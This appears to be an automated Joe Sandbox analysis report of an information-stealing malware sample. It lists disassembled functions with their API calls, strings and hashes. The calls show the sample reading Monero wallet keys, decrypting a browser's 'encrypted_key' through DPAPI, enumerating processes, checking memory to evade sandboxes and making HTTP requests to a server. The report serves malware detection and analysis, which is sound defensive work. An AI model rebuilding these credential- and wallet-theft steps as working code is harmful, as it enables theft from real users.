Opcode Fuzzy Hash: ffff0d4b5dbd6aea8d9a645777ef4ca0f22a1caebc6f6fb2e2e3a9f120ad718b
Instruction Fuzzy Hash: CF819A729101089ACF05FBA4DC96EEE7338BF65304F904529F516A60A1EF746A0CCBE2

Function 0018F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001A1524,001A0D7A), ref: 0018F38C
lstrlen.KERNEL32(00000000), ref: 0018F3AB

Strings

^userContextId=4294967295, xrefs: 0018F3DC
moz-extension+++, xrefs: 0018F3ED

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: 5c1a3e603ed3483bca1af5bb0ba05d6323eb57a6bd642c38e40f92bd26a8d7d8
Instruction ID: 05e7c4a2c5a253713a9d21a1c1ff88abebd081a847fcecaa35472f35aafcdf7f
Opcode Fuzzy Hash: 5c1a3e603ed3483bca1af5bb0ba05d6323eb57a6bd642c38e40f92bd26a8d7d8
Instruction Fuzzy Hash: 3E51AB76D10108AACF04FBA4DC56DED7779AFA5300F808528F81666191EF746A0DCBE2

Function 00189D30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00189D89

Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B3F
Part of subcall function 00189B10: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 00189B51
Part of subcall function 00189B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 00189B7A
Part of subcall function 00189B10: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 00189B8F

Part of subcall function 00189BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00189BD4
Part of subcall function 00189BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00189BF3
Part of subcall function 00189BB0: LocalFree.KERNEL32(?), ref: 00189C23

Strings

"encrypted_key":", xrefs: 00189D80
, xrefs: 00189E11
DPAPI, xrefs: 00189DD9

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 549879638-738592651
Opcode ID: 295d7067dc2cf559a750860971aff9279f2ddb3a450aeba3c6ef6171ca0c56e8
Instruction ID: b5eea2731902e6fcc54bad8fb3e6b1ec649b144a38c84754e4d6039dc4890a7e
Opcode Fuzzy Hash: 295d7067dc2cf559a750860971aff9279f2ddb3a450aeba3c6ef6171ca0c56e8
Instruction Fuzzy Hash: ED311EB6D10209ABCF14EFE4DC85AFFB7B8AF58300F584519E905A7241EB309A05CBA1

Function 00198120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0019816A
Process32First.KERNEL32(?,00000128), ref: 0019817E
Process32Next.KERNEL32(?,00000128), ref: 00198193

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

FindCloseChangeNotification.KERNEL32(?), ref: 00198201

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 39f1af4814737aae62e82f24ca9c9ffa4a2ceb9c4d493eced0dcca6f9ca48a10
Instruction ID: 53c8beca4edb6671318a4a42a1d0ba64916838c2522073fb131a0f6f97b5b23a
Opcode Fuzzy Hash: 39f1af4814737aae62e82f24ca9c9ffa4a2ceb9c4d493eced0dcca6f9ca48a10
Instruction Fuzzy Hash: 99316B71901218ABCF25EB54DC41FEEB778FF1A700F5041A9E50AA21A0DF306A48CFE1

Function 00194CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Part of subcall function 001862D0: InternetOpenA.WININET(001A0DE6,00000001,00000000,00000000,00000000), ref: 00186331
Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,013AE450), ref: 00186353
Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,013ADA48,00000000,00000000,00400100,00000000), ref: 001863D5
Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00194D08

Strings

ERROR, xrefs: 00194CFA
ERROR, xrefs: 00194D53

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: ae6e904c275f251272a8abf170502a13b42da3a4835e9bf9ef24f5b5556dc2f0
Instruction ID: b95e58929e8ea42092437f702f3facb37db1f2c2eac37cdb7248233cc22fd087
Opcode Fuzzy Hash: ae6e904c275f251272a8abf170502a13b42da3a4835e9bf9ef24f5b5556dc2f0
Instruction Fuzzy Hash: 9A11EC34900108ABCF18FF64DC56EED7768AF70300F908568B81A575A2EB706B09CAD2

Function 00181220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
ExitProcess.KERNEL32 ref: 00181294

Strings

@, xrefs: 00181233

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: c5703376427ad1c38659670b25dd5e53df10d760981dd592ca346b06448c97ff
Instruction ID: f6bdd120332639c0290f42c782c5cce9ad408f262771bb6178b936a325705bce
Opcode Fuzzy Hash: c5703376427ad1c38659670b25dd5e53df10d760981dd592ca346b06448c97ff
Instruction Fuzzy Hash: 6601FBB1940308BAEF10EBE4DC49BAEBB7DAB14705F208449F605B6180D77456458B59

Function 00194A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 00194A5A
lstrcat.KERNEL32(?,001A1040), ref: 00194A77
lstrcat.KERNEL32(?,013A8950), ref: 00194A8B
lstrcat.KERNEL32(?,001A1044), ref: 00194A9D

Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423

Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: ceb6111721ed0f7ee5eb7dfef577234cb6b7efa563e430b3fe519b613054f3ad
Instruction ID: 42925a4eca7fb9f192d80579947cd597429f72680b58df87cd16793b48f7cc80
Opcode Fuzzy Hash: ceb6111721ed0f7ee5eb7dfef577234cb6b7efa563e430b3fe519b613054f3ad
Instruction Fuzzy Hash: B921DD7A91020467CB14F7B0EC46EDD373CAB66300F408555B54A93181EF745BC88FA1

Function 00190580 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013A89C0), ref: 001905DA
StrCmpCA.SHLWAPI(00000000,013A8940), ref: 001906A6
StrCmpCA.SHLWAPI(00000000,013A89B0), ref: 001907DD

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 80a13a71c45bc9e22266111a4323fabc3a00c5d3e99a377efb9304d238b5b139
Instruction ID: b8f1ccd9e53af0b8c4325388ba74c0c96ab859c2945ad81d33d1fdffaaa9008d
Opcode Fuzzy Hash: 80a13a71c45bc9e22266111a4323fabc3a00c5d3e99a377efb9304d238b5b139
Instruction Fuzzy Hash: 86913675A002489FCF18EF64D995EED7779BF95300F508529E80A9F251DB309B09CBD2

Function 001905A5 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013A89C0), ref: 001905DA
StrCmpCA.SHLWAPI(00000000,013A8940), ref: 001906A6
StrCmpCA.SHLWAPI(00000000,013A89B0), ref: 001907DD

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
